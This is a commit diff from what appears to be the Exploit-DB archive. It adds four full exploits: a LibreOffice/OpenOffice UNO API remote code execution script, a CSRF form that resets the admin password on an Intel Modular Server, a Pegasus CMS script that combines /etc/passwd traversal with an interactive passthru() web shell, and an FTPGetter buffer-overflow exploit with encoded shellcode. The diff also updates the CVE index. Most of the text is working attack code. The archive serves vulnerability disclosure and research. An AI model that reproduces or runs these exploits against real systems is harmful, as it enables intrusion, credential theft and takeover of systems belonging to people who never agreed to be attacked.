DB: 2019-03-15
6 changes to exploits/shellcodes Microsoft Windows - .reg File / Dialog Box Message Spoofing Microsoft Windows - '.reg' File / Dialog Box Message Spoofing FTPGetter Standard 5.97.0.177 - Remote Code Execution Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password) Pegasus CMS 1.0 - 'extra_fields.php' Plugin Remote Code Execution
This commit is contained in:
parent
c5fbc00e3e
commit
b4e61d43c1
7 changed files with 414 additions and 3 deletions
|
@ -6,7 +6,7 @@
|
||||||
# Software Link: https://github.com/cloudjee/wavemaker/blob/master/wavemaker/wavemaker-studio/
|
# Software Link: https://github.com/cloudjee/wavemaker/blob/master/wavemaker/wavemaker-studio/
|
||||||
# Affected Version: 6.6
|
# Affected Version: 6.6
|
||||||
# Tested on: Parrot OS
|
# Tested on: Parrot OS
|
||||||
# CVE : N/A
|
# CVE : 2019-8982
|
||||||
|
|
||||||
# Description
|
# Description
|
||||||
# Wavemaker Studio 6.6 contains an exploitable unvaildated parameter allowing an
|
# Wavemaker Studio 6.6 contains an exploitable unvaildated parameter allowing an
|
||||||
|
|
70
exploits/multiple/remote/46544.py
Executable file
70
exploits/multiple/remote/46544.py
Executable file
|
@ -0,0 +1,70 @@
|
||||||
|
"""
|
||||||
|
# Exploit Title: Apache UNO API RCE
|
||||||
|
# Date: 2018-09-18
|
||||||
|
# Exploit Author: sud0woodo
|
||||||
|
# Vendor Homepage: https://www.apache.org/
|
||||||
|
# Software Link: https://www.openoffice.org/api/
|
||||||
|
# Version:
|
||||||
|
|
||||||
|
LibreOffice Version: 6.1.2 / OpenOffice 4.1.6
|
||||||
|
|
||||||
|
(but really any version with the UNO API included)
|
||||||
|
# Tested on:
|
||||||
|
|
||||||
|
Ubuntu Mate 18.04 with kernel 4.15.0-34-generic (but works platform independent)
|
||||||
|
|
||||||
|
Proof of Concept code attached as .txt file.
|
||||||
|
|
||||||
|
HackDefense advisory:
|
||||||
|
https://hackdefense.com/blog/security-advisory-rce-in-apache-uno-api/
|
||||||
|
|
||||||
|
HackDefense blogpost:
|
||||||
|
https://hackdefense.com/blog/finding-RCE-capabilities-in-the-apache-uno-api/
|
||||||
|
|
||||||
|
Unauthenticated RCE LibreOffice/OpenOffice with UNO API
|
||||||
|
|
||||||
|
This code represents a small proof of concept of an unauthenticted remote code execution using
|
||||||
|
the Apache OpenOffice UNO API (https://www.openoffice.org/udk/). This code has been tested
|
||||||
|
against LibreOffice Version: 6.1.1.2 on a Ubuntu Mate 18.04 with kernel 4.15.0-34-generic.
|
||||||
|
|
||||||
|
For this PoC to work the target machine needs to run the ServiceManager using an external
|
||||||
|
interface. The following command was used to test this PoC:
|
||||||
|
|
||||||
|
[Ubuntu]
|
||||||
|
Open a terminal and execute the following command:
|
||||||
|
soffice --accept='socket,host=0.0.0.0,port=2002;urp;StarOffice.Service'
|
||||||
|
|
||||||
|
The above command will start the LibreOffice ServiceManager but this can be executed with the --invisible
|
||||||
|
flag to prevent the dialogbox from popping up on the target.
|
||||||
|
|
||||||
|
I also made a scanner available that can be used to check for the presence of the StarOffice manager running on a machine:
|
||||||
|
|
||||||
|
https://sud0woodo.sh/2019/03/06/building-a-go-scanner-to-search-externally-reachable-staroffice-managers/
|
||||||
|
"""
|
||||||
|
|
||||||
|
import uno
|
||||||
|
from com.sun.star.system import XSystemShellExecute
|
||||||
|
import argparse
|
||||||
|
|
||||||
|
parser = argparse.ArgumentParser()
|
||||||
|
parser.add_argument('--host', help='host to connect to', dest='host', required=True)
|
||||||
|
parser.add_argument('--port', help='port to connect to', dest='port', required=True)
|
||||||
|
|
||||||
|
args = parser.parse_args()
|
||||||
|
# Define the UNO component
|
||||||
|
localContext = uno.getComponentContext()
|
||||||
|
|
||||||
|
# Define the resolver to use, this is used to connect with the API
|
||||||
|
resolver = localContext.ServiceManager.createInstanceWithContext(
|
||||||
|
"com.sun.star.bridge.UnoUrlResolver", localContext )
|
||||||
|
|
||||||
|
# Connect with the provided host on the provided target port
|
||||||
|
print("[+] Connecting to target...")
|
||||||
|
context = resolver.resolve(
|
||||||
|
"uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.host,args.port))
|
||||||
|
|
||||||
|
# Issue the service manager to spawn the SystemShellExecute module and execute calc.exe
|
||||||
|
service_manager = context.ServiceManager
|
||||||
|
print("[+] Connected to {0}".format(args.host))
|
||||||
|
shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecute")
|
||||||
|
shell_execute.execute("calc.exe", '',1)
|
|
@ -6,7 +6,7 @@
|
||||||
# Software Link: https://sourceforge.net/projects/pilus/files/PiLUS/1.4.1/PiLUS-1.4.1-Ubiungu-stable.zip/download
|
# Software Link: https://sourceforge.net/projects/pilus/files/PiLUS/1.4.1/PiLUS-1.4.1-Ubiungu-stable.zip/download
|
||||||
# Version: 1.4.1
|
# Version: 1.4.1
|
||||||
# Tested on: ParrotOS
|
# Tested on: ParrotOS
|
||||||
# CVE : N/A
|
# CVE : 2019-9769
|
||||||
|
|
||||||
PilusCart 1.4.1 is vulnerable to CSRF attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), a form will be submitted that will add a new user as administrator.
|
PilusCart 1.4.1 is vulnerable to CSRF attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), a form will be submitted that will add a new user as administrator.
|
||||||
|
|
||||||
|
|
71
exploits/php/webapps/46541.html
Normal file
71
exploits/php/webapps/46541.html
Normal file
|
@ -0,0 +1,71 @@
|
||||||
|
<!--
|
||||||
|
|
||||||
|
Intel Modular Server System 10.18 CSRF Change Admin Password Exploit
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Intel Corporation
|
||||||
|
Product web page: https://www.intel.com
|
||||||
|
Affected version: 10.18.100.20130627.38849
|
||||||
|
5.5.100.20091202.19584
|
||||||
|
|
||||||
|
Summary: The Intel Modular Server System is a blade system manufactured by
|
||||||
|
Intel using their own motherboards and processors. The Intel Modular Server
|
||||||
|
System consists of an Intel Modular Server Chassis, up to six diskless Compute
|
||||||
|
Blades, an integrated storage area network (SAN), and three to five Service
|
||||||
|
Modules.
|
||||||
|
|
||||||
|
Desc: The application interface allows users to perform certain actions via
|
||||||
|
HTTP requests without performing any validity checks to verify the requests.
|
||||||
|
This can be exploited to perform certain actions with administrative privileges
|
||||||
|
if a logged-in user visits a malicious web site.
|
||||||
|
|
||||||
|
Tested on: lighttpd/1.4.30
|
||||||
|
lighttpd/1.4.21
|
||||||
|
PHP/5.3.10
|
||||||
|
PHP/5.2.2
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2019-5514
|
||||||
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5514.php
|
||||||
|
|
||||||
|
|
||||||
|
11.03.2019
|
||||||
|
|
||||||
|
-->
|
||||||
|
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<script>history.pushState('', 't00t', 'index.php')</script>
|
||||||
|
<form action="https://192.168.1.17:444/users/?table=User&UserId=1&action=edit&template=none" method="POST">
|
||||||
|
<input type="hidden" name="_dbTable[User][1][UserId]" value="1" />
|
||||||
|
<input type="hidden" name="_dbTable[User][1][Username]" value="admin" />
|
||||||
|
<input type="hidden" name="_dbTable[User][1][AuthMethod]" value="Local" />
|
||||||
|
<input type="hidden" name="_dbTable[User][1][Password][update]" value="on" />
|
||||||
|
<input type="hidden" name="_dbTable[User][1][Password][new]" value="(ontrol!23" />
|
||||||
|
<input type="hidden" name="_dbTable[User][1][Password][confirm]" value="(ontrol!23" />
|
||||||
|
<input type="hidden" name="_dbTable[User][1][AlertEmail]" value="lab@zeroscience.mk" />
|
||||||
|
<input type="hidden" name="_dbTable[User][1][CriticalEmail]" value="" />
|
||||||
|
<input type="hidden" name="_dbTable[User][1][Phone]" value="031-337-101" />
|
||||||
|
<input type="hidden" name="_dbTable[User][1][Locked]" value="0" />
|
||||||
|
<input type="hidden" name="action" value="Update" />
|
||||||
|
<input type="hidden" name="_dbTable[UserRights][21][Alerts]" value="3" />
|
||||||
|
<input type="hidden" name="_dbTable[UserRights][22][Alerts]" value="3" />
|
||||||
|
<input type="hidden" name="_dbTable[UserRights][23][Alerts]" value="3" />
|
||||||
|
<input type="hidden" name="_dbTable[UserRights][24][Alerts]" value="3" />
|
||||||
|
<input type="hidden" name="_dbTable[UserRights][25][Alerts]" value="3" />
|
||||||
|
<input type="hidden" name="_dbTable[UserRights][26][Alerts]" value="3" />
|
||||||
|
<input type="hidden" name="_dbTable[UserRights][27][Alerts]" value="3" />
|
||||||
|
<input type="hidden" name="_dbTable[UserRights][28][Alerts]" value="3" />
|
||||||
|
<input type="hidden" name="_dbTable[UserRights][29][Alerts]" value="3" />
|
||||||
|
<input type="hidden" name="_dbTable[UserRights][247][Alerts]" value="3" />
|
||||||
|
<input type="hidden" name="DbTable" value="User" />
|
||||||
|
<input type="hidden" name="DbTableKey" value="1" />
|
||||||
|
<input type="submit" value="Do et!" />
|
||||||
|
</form>
|
||||||
|
</body>
|
||||||
|
</html>
|
107
exploits/php/webapps/46542.py
Executable file
107
exploits/php/webapps/46542.py
Executable file
|
@ -0,0 +1,107 @@
|
||||||
|
# Exploit Title: Pegasus extra_fields.php Plugin Remote Code Execution
|
||||||
|
# Date: 14 March 2019
|
||||||
|
# Exploit Author: R3zk0n
|
||||||
|
# Vendor Homepage: https://www.wisdom.com.au/web/pegasus-cms
|
||||||
|
# Software Link: N/A
|
||||||
|
# Version: 1.0
|
||||||
|
# Tested on: Linux
|
||||||
|
# CVE : N/A
|
||||||
|
|
||||||
|
The Pegasus CMS is vulnerable to directory travaseral and Remote code execution due to the way the extra_fields.php plugin functions.
|
||||||
|
|
||||||
|
The Plugin can be exploited using the safer eval trick linked below http://justanotherhacker.com/2016/04/analysis_of_the_safer_eval_rce_aka__the_wahckon_bug.html to obtain remote code execution
|
||||||
|
|
||||||
|
Exploit attached below:
|
||||||
|
|
||||||
|
#Eval is secure.. not really.
|
||||||
|
# These Greetz to people who are smart, Wireghoul, Nano, Silverly, m3mantra, and leostat. and z3al
|
||||||
|
requests.packages.urllib3.disable_warnings()
|
||||||
|
banner = '''
|
||||||
|
Welcome to the DANGER ZONE.
|
||||||
|
;;J,ss,g,;
|
||||||
|
,s#@##"""77"^""77""@@Mw,
|
||||||
|
,#@#C7: ,, *^*@@@w
|
||||||
|
;@#7. ;#@#. ]ssmMMm#@@@m,
|
||||||
|
,##\` ,< ,@@@@Q ,,#@#*7` ;s@@@@@@@@@Q
|
||||||
|
;@#` ]@C ;@@@@@@@@@@"\ ;@@@@@@@@@@@@@@@m
|
||||||
|
@#\ #@@w#@@@@@@@@@@#~ @@@#M5"7j5#@@@@@@@@Q
|
||||||
|
;@C @@@@@@@@@@@@@@#\ @#\, *77@@@k
|
||||||
|
##. #@@@@@@@@@@@@@# '* {@@@
|
||||||
|
@#` a@@@@@@@@@@@@@@L *%@@
|
||||||
|
{@* ]@@@@@@@@@@@@@@#C* "@@
|
||||||
|
.@b;,s#@@@@@@@#@@#@@@@@@#C* ;s#@@@@@@m, j@b
|
||||||
|
@@@#@@@@@@@@@@@@@@@@@@#C =* ,ppJJs#@@@@@@@@@@@@@k @@
|
||||||
|
@#1@@@@@@@@@@@@@@@@#W~ ;@QQ@@@@@@@@@#` `|7@@@@~ ]@p
|
||||||
|
@[ @@5"@@@@@@@@@@#~ s@@@@@####@@@@@#\ @@@b ]@b
|
||||||
|
@[ @ j@@@@@@@@~]#"7 "@@#"\ 7@@C @@@b ]@b
|
||||||
|
@@ @@@@@@@@@@c ^@@ ]@ ,@@@# @@b
|
||||||
|
@@~ @ @@@@@@@@@@@b @# a@@@@" ]@@
|
||||||
|
j@Q @@@@@@@@@@@@@@@@o ,J ]\ s@@@@#"` ]@@L
|
||||||
|
]@b ]@@@@@@@@@@@@@@@@o ,@@@@> ;@@@@@#^ #@@#
|
||||||
|
@@Q """%*577"%@@@@@@# ]@@@@@C ;@@@@#C ;@@@#*
|
||||||
|
%@m @@@@@@@ .@@@@@# {@@@@@> s@@@@#*
|
||||||
|
7@@ @@M@@@@@k ^@@@"# @@@@@@@@@@@@@@@#
|
||||||
|
*@@m @@bj@@@b@@@o|"^]# %@@@@@@#M7@@#^
|
||||||
|
7@@m "# @@# @@7@@@@@@~ ^||:`,#@#C
|
||||||
|
^%@@m j @b j# \@@@@@@ ,#@@#
|
||||||
|
`7@@@mJ 7 ' |%@@@@@m, -g,ss#@@@@#C
|
||||||
|
`7%@@@Mm, `7"%####@@MMMM#@@@#M7.
|
||||||
|
^7@@@@@@@@@@@@@@@@@@@@#MT^:
|
||||||
|
`~^"7""""7^\*:
|
||||||
|
Chimeria Exploit.
|
||||||
|
pegausCMS Exploit's.
|
||||||
|
'''
|
||||||
|
|
||||||
|
|
||||||
|
print banner
|
||||||
|
|
||||||
|
|
||||||
|
raw_url = raw_input("Please enter a domain name: \n")
|
||||||
|
|
||||||
|
|
||||||
|
def dir_Trav(raw_url):
|
||||||
|
print "Checking for directory travseral..\n"
|
||||||
|
dir_list = requests.get("https://www."+ raw_url + "/file/includes/template/inc/test.cgi?&filename=/../../../../../../../../etc/passwd", headers={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Connection": "close", "Cache-Control": "max-age=0"})
|
||||||
|
print dir_list.content
|
||||||
|
return
|
||||||
|
print "Trying to execute directory travseral"
|
||||||
|
dir_Trav(raw_url)
|
||||||
|
r = requests.get("http://" + raw_url)
|
||||||
|
print "Checking Status code: %s" % r.status_code
|
||||||
|
if r.status_code == 200:
|
||||||
|
print "Connected"
|
||||||
|
print "Checking is using vulnerable CMS."
|
||||||
|
vuln = "http://" + raw_url + "/file/includes/plugins/globalFields/submit.php"
|
||||||
|
b = requests.get("http://" + raw_url + "/file/includes/plugins/globalFields/submit.php")
|
||||||
|
print "Checking CMS Status: %s " % b.status_code
|
||||||
|
if b.status_code == 200:
|
||||||
|
print "Seems exploitable.. Lets try to list the files!"
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
print raw_url
|
||||||
|
list_files = requests.post("http://www."+ raw_url +"/file/includes/plugins/extra_fields/submit.php", headers={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}, data={"action": "passthru(\"ls -lah\");exit;phpinfo"})
|
||||||
|
print list_files.content
|
||||||
|
status = list_files.status_code
|
||||||
|
while status == 200:
|
||||||
|
try:
|
||||||
|
ShellCheck = raw_input("Shell>").strip()
|
||||||
|
|
||||||
|
Shell = requests.post("http://www."+ raw_url +"/file/includes/plugins/extra_fields/submit.php", headers={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}, data={"action": "passthru(\"{}\");exit;phpinfo".format(ShellCheck)})
|
||||||
|
|
||||||
|
print Shell.content
|
||||||
|
if ShellCheck == "exit":
|
||||||
|
sys.exit(0)
|
||||||
|
except KeyboardInterrupt:
|
||||||
|
print "Your exited bye"
|
||||||
|
sys.exit(0)
|
||||||
|
|
||||||
|
else:
|
||||||
|
print "Connected but does not seem exploitable. \n"
|
||||||
|
print "Bye!!!!!!!!!! \n"
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
else:
|
||||||
|
print "Not connected"
|
159
exploits/windows/remote/46543.py
Executable file
159
exploits/windows/remote/46543.py
Executable file
|
@ -0,0 +1,159 @@
|
||||||
|
# Exploit Title: FTPGetter Standard - v.5.97.0.177 Remote Code Execution
|
||||||
|
# Date: 05/03/2019
|
||||||
|
# Exploit Author: https://github.com/w4fz5uck5 | @w4fz5uck5
|
||||||
|
# Vendor Homepage: https://www.ftpgetter.com
|
||||||
|
# Software Link: https://www.ftpgetter.com/ftpgetter_setup.exe
|
||||||
|
# Version: v.5.97.0.177
|
||||||
|
# Tested on: Windows 7 x64
|
||||||
|
# CVE : CVE-2019-9760
|
||||||
|
|
||||||
|
|
||||||
|
import socket
|
||||||
|
import struct
|
||||||
|
import time
|
||||||
|
import sys
|
||||||
|
|
||||||
|
# badchars = (
|
||||||
|
# "\x59\x5a\x5b\x5c\x00\x0a\x0d\x20\x40\x1a\x80\x82\x83\x84\x85\x86\x87"
|
||||||
|
# "\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b"
|
||||||
|
# "\x9c\x9e\x9f\xc0\xc1" .....
|
||||||
|
# )
|
||||||
|
|
||||||
|
# x86/alpha_mixed simple fixer -> bytes "\x89\xe3\xd9\xe1\xd9\x73\xf4"
|
||||||
|
calc = ""
|
||||||
|
calc += "\x54" # push esp
|
||||||
|
calc += "\x58" # pop eax
|
||||||
|
calc += "\x05\x43\x06\x00\x00" # add eax,0x643
|
||||||
|
calc += "\x50" # push eax
|
||||||
|
calc += "\x5f" # pop edi
|
||||||
|
calc += "\x25\x4A\x4D\x4E\x55" # zerout EAX
|
||||||
|
calc += "\x25\x35\x32\x31\x2A" # zerout EAX
|
||||||
|
calc += "\x04\xab" # ADD AL,0xab
|
||||||
|
calc += "\x31\x07" # XOR DWORD PTR DS:[EDI],EAX
|
||||||
|
calc += "\x31\x47\x01" # XOR DWORD PTR DS:[EDI+1],EAX
|
||||||
|
calc += "\x31\x47\x02" # XOR DWORD PTR DS:[EDI+2],EAX
|
||||||
|
calc += "\x2C\x5B" # SUB AL,0x5b -> EAX = 0x50
|
||||||
|
calc += "\x31\x47\x03" # XOR DWORD PTR DS:[EDI+3],EAX
|
||||||
|
calc += "\x31\x47\x04" # XOR DWORD PTR DS:[EDI+4],EAX
|
||||||
|
calc += "\x90\x90\x90\x90" # padding
|
||||||
|
|
||||||
|
# "\x89\xe3"
|
||||||
|
calc += "\x54" # push esp
|
||||||
|
calc += "\x5b" # pop ebx
|
||||||
|
|
||||||
|
# "\xd9\xe1\xd9" xored: 0xab
|
||||||
|
calc += "\x72\x4a\x72"
|
||||||
|
|
||||||
|
# \x73\xf4 xored: 0x50
|
||||||
|
calc += "\x23\xa4"
|
||||||
|
|
||||||
|
calc += "\x58\x50\x59\x49\x49\x49"
|
||||||
|
calc += "\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33"
|
||||||
|
calc += "\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41"
|
||||||
|
calc += "\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41"
|
||||||
|
calc += "\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a"
|
||||||
|
calc += "\x4a\x49\x58\x59\x48\x4b\x4f\x4e\x48\x39\x47\x53\x45"
|
||||||
|
calc += "\x37\x56\x51\x38\x59\x32\x54\x51\x34\x5a\x54\x51\x4a"
|
||||||
|
calc += "\x51\x39\x4f\x39\x58\x31\x45\x43\x56\x51\x53\x42\x35"
|
||||||
|
calc += "\x49\x4b\x33\x48\x42\x55\x54\x45\x53\x43\x42\x45\x45"
|
||||||
|
calc += "\x31\x4b\x58\x56\x50\x56\x4d\x33\x39\x59\x32\x51\x4a"
|
||||||
|
calc += "\x5a\x32\x42\x4b\x31\x4d\x32\x43\x45\x4b\x32\x44\x4b"
|
||||||
|
calc += "\x4e\x53\x4d\x31\x49\x50\x38\x59\x34\x4b\x55\x31\x49"
|
||||||
|
calc += "\x30\x54\x51\x5a\x47\x55\x53\x57\x31\x4d\x54\x53\x4c"
|
||||||
|
calc += "\x59\x4b\x49\x42\x49\x38\x4d\x4a\x5a\x37\x4f\x4a\x33"
|
||||||
|
calc += "\x58\x34\x50\x4b\x4b\x51\x4b\x5a\x48\x4e\x4d\x42\x50"
|
||||||
|
calc += "\x53\x4b\x46\x48\x4e\x53\x4b\x36\x35\x58\x42\x44\x4e"
|
||||||
|
calc += "\x4c\x30\x52\x54\x4e\x4c\x4d\x59\x4d\x46\x4d\x37\x4c"
|
||||||
|
calc += "\x37\x4c\x4f\x50\x4b\x4c\x4f\x4c\x4c\x42\x57\x53\x49"
|
||||||
|
calc += "\x38\x58\x57\x4d\x44\x32\x4e\x57\x53\x38\x59\x5a\x43"
|
||||||
|
calc += "\x33\x35\x49\x44\x43\x35\x4c\x32\x45\x4b\x5a\x49\x35"
|
||||||
|
calc += "\x59\x51\x4a\x35\x4c\x50\x39\x4f\x4d\x41\x41"
|
||||||
|
|
||||||
|
# Encode addresses and create jmp esp
|
||||||
|
# Calculate jmp esp offset and put it on stack
|
||||||
|
jump_back = "\x55" # push ebp
|
||||||
|
jump_back += "\x58" # pop eax
|
||||||
|
jump_back += "\x05\x2b\x08\x00\x00" # add eax,2091
|
||||||
|
jump_back += "\x50" # push eax
|
||||||
|
|
||||||
|
# zerout EAX
|
||||||
|
jump_back += "\x25\x4A\x4D\x4E\x55" # and eax, 0x554e4d4a
|
||||||
|
jump_back += "\x25\x35\x32\x31\x2A" # and eax, 0x2a313235
|
||||||
|
|
||||||
|
jump_back += "\x3E\x33\x04\x24" # XOR EAX,DWORD PTR DS:[ESP] -> send stack addr to EAX
|
||||||
|
jump_back += "\x50" # push eax
|
||||||
|
jump_back += "\x5f" # pop edi
|
||||||
|
|
||||||
|
# zerout EAX
|
||||||
|
jump_back += "\x25\x4A\x4D\x4E\x55" # and eax, 0x554e4d4a
|
||||||
|
jump_back += "\x25\x35\x32\x31\x2A" # and eax, 0x2a313235
|
||||||
|
|
||||||
|
jump_back += "\x04\x81" # ADD AL,0x81
|
||||||
|
jump_back += "\x31\x07" # XOR DWORD PTR DS:[EDI],EAX
|
||||||
|
jump_back += "\x31\x47\x01" # XOR DWORD PTR DS:[EDI+1],EAX
|
||||||
|
jump_back += "\x90\x90\x90\x90" # padding
|
||||||
|
|
||||||
|
# Tool utilized: https://github.com/ihack4falafel/Slink
|
||||||
|
# All rights reserved to ihack4falafel
|
||||||
|
#
|
||||||
|
# \x54\x58\x66\x05\x04\x06\x50\xc3
|
||||||
|
jump_back += "\x25\x4A\x4D\x4E\x55" # and eax, 0x554e4d4a
|
||||||
|
jump_back += "\x25\x35\x32\x31\x2A" # and eax, 0x2a313235
|
||||||
|
jump_back += "\x05\x02\x03\x30\x62" # add eax, 0x62300302
|
||||||
|
jump_back += "\x05\x02\x03\x20\x61" # add eax, 0x61200302
|
||||||
|
jump_back += "\x50" # push eax
|
||||||
|
jump_back += "\x25\x4A\x4D\x4E\x55" # and eax, 0x554e4d4a
|
||||||
|
jump_back += "\x25\x35\x32\x31\x2A" # and eax, 0x2a313235
|
||||||
|
jump_back += "\x05\x32\x34\x33\x03" # add eax, 0x03333432
|
||||||
|
jump_back += "\x05\x22\x24\x33\x02" # add eax, 0x02332422
|
||||||
|
jump_back += "\x50" # push eax
|
||||||
|
|
||||||
|
# jump to second shellcode
|
||||||
|
jump_back += "\x7e\x65" # jmp esp xored: 0x81
|
||||||
|
|
||||||
|
# Overflow size 493
|
||||||
|
payload = "\x90" * 29
|
||||||
|
payload += calc # shellcode
|
||||||
|
payload += "\x90" * (493 - len(payload)) # padding
|
||||||
|
payload += "\x7e\x06\x90\x90" # NSEH
|
||||||
|
payload += "\x31\x20\x77\x00" # SEH -> POP ESI # POP EBX # RETN
|
||||||
|
payload += "\x90\x90\x90\x90"
|
||||||
|
payload += jump_back # jump to our calc
|
||||||
|
payload += "\x90" * 700 # Final padding
|
||||||
|
|
||||||
|
try:
|
||||||
|
host, port = "0.0.0.0", 21
|
||||||
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
|
s.bind((host, int(port)))
|
||||||
|
s.listen(5)
|
||||||
|
print "[*] Listening server at port: {}".format(port)
|
||||||
|
print "[*] Waiting for the client!.."
|
||||||
|
|
||||||
|
except Exception as e:
|
||||||
|
print "[-] Failed attempt to create bind socket!"
|
||||||
|
sys.exit(0)
|
||||||
|
|
||||||
|
try:
|
||||||
|
conn, client = s.accept()
|
||||||
|
conn.send("220 Welcome to server !\r\n")
|
||||||
|
conn.recv(1024)
|
||||||
|
|
||||||
|
print "[+] User started communication with server!"
|
||||||
|
conn.send("331 anonymous OK!\r\n")
|
||||||
|
conn.recv(1024)
|
||||||
|
print "[+] Received anonymous user from the client!"
|
||||||
|
|
||||||
|
print "[*] CALC shellcode Length: " + str(len(calc))
|
||||||
|
print "[*] Jump Back shellcode Length: " + str(len(jump_back))
|
||||||
|
print "[*] Payload final size: " + str(len(payload))
|
||||||
|
print "[!] Attempting to send payload!..."
|
||||||
|
conn.send("230 " + payload + "\r\n")
|
||||||
|
|
||||||
|
time.sleep(1)
|
||||||
|
print "[+] You should have your poped calc!"
|
||||||
|
|
||||||
|
conn.close()
|
||||||
|
s.close()
|
||||||
|
except:
|
||||||
|
print "[-] Failed attempt to send payload!"
|
||||||
|
sys.exit(0)
|
|
@ -6353,7 +6353,7 @@ id,file,description,date,author,type,platform,port
|
||||||
46504,exploits/android/dos/46504.txt,"Android - getpidcon() Usage in Hardware binder ServiceManager Permits ACL Bypass",2019-03-06,"Google Security Research",dos,android,
|
46504,exploits/android/dos/46504.txt,"Android - getpidcon() Usage in Hardware binder ServiceManager Permits ACL Bypass",2019-03-06,"Google Security Research",dos,android,
|
||||||
46529,exploits/linux/dos/46529.c,"Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak",2019-03-11,wally0813,dos,linux,
|
46529,exploits/linux/dos/46529.c,"Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak",2019-03-11,wally0813,dos,linux,
|
||||||
46532,exploits/windows/dos/46532.py,"Core FTP 2.0 build 653 - 'PBSZ' Denial of Service (PoC)",2019-03-12,Hodorsec,dos,windows,21
|
46532,exploits/windows/dos/46532.py,"Core FTP 2.0 build 653 - 'PBSZ' Denial of Service (PoC)",2019-03-12,Hodorsec,dos,windows,21
|
||||||
46533,exploits/windows/dos/46533.txt,"Microsoft Windows - .reg File / Dialog Box Message Spoofing",2019-03-13,hyp3rlinx,dos,windows,
|
46533,exploits/windows/dos/46533.txt,"Microsoft Windows - '.reg' File / Dialog Box Message Spoofing",2019-03-13,hyp3rlinx,dos,windows,
|
||||||
46534,exploits/windows/dos/46534.txt,"Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal",2019-03-13,"Kevin Randall",dos,windows,21
|
46534,exploits/windows/dos/46534.txt,"Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal",2019-03-13,"Kevin Randall",dos,windows,21
|
||||||
46535,exploits/windows/dos/46535.txt,"Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal",2019-03-13,"Kevin Randall",dos,windows,21
|
46535,exploits/windows/dos/46535.txt,"Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal",2019-03-13,"Kevin Randall",dos,windows,21
|
||||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||||
|
@ -17251,6 +17251,8 @@ id,file,description,date,author,type,platform,port
|
||||||
46516,exploits/multiple/remote/46516.py,"OpenSSH SCP Client - Write Arbitrary Files",2019-01-11,"Harry Sintonen",remote,multiple,
|
46516,exploits/multiple/remote/46516.py,"OpenSSH SCP Client - Write Arbitrary Files",2019-01-11,"Harry Sintonen",remote,multiple,
|
||||||
46539,exploits/php/remote/46539.rb,"elFinder PHP Connector < 2.1.48 - exiftran Command Injection (Metasploit)",2019-03-13,Metasploit,remote,php,
|
46539,exploits/php/remote/46539.rb,"elFinder PHP Connector < 2.1.48 - exiftran Command Injection (Metasploit)",2019-03-13,Metasploit,remote,php,
|
||||||
46540,exploits/windows/remote/46540.py,"Apache Tika-server < 1.18 - Command Injection",2019-03-13,"Rhino Security Labs",remote,windows,
|
46540,exploits/windows/remote/46540.py,"Apache Tika-server < 1.18 - Command Injection",2019-03-13,"Rhino Security Labs",remote,windows,
|
||||||
|
46543,exploits/windows/remote/46543.py,"FTPGetter Standard 5.97.0.177 - Remote Code Execution",2019-03-14,w4fz5uck5,remote,windows,
|
||||||
|
46544,exploits/multiple/remote/46544.py,"Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution",2019-03-14,sud0woodo,remote,multiple,
|
||||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||||
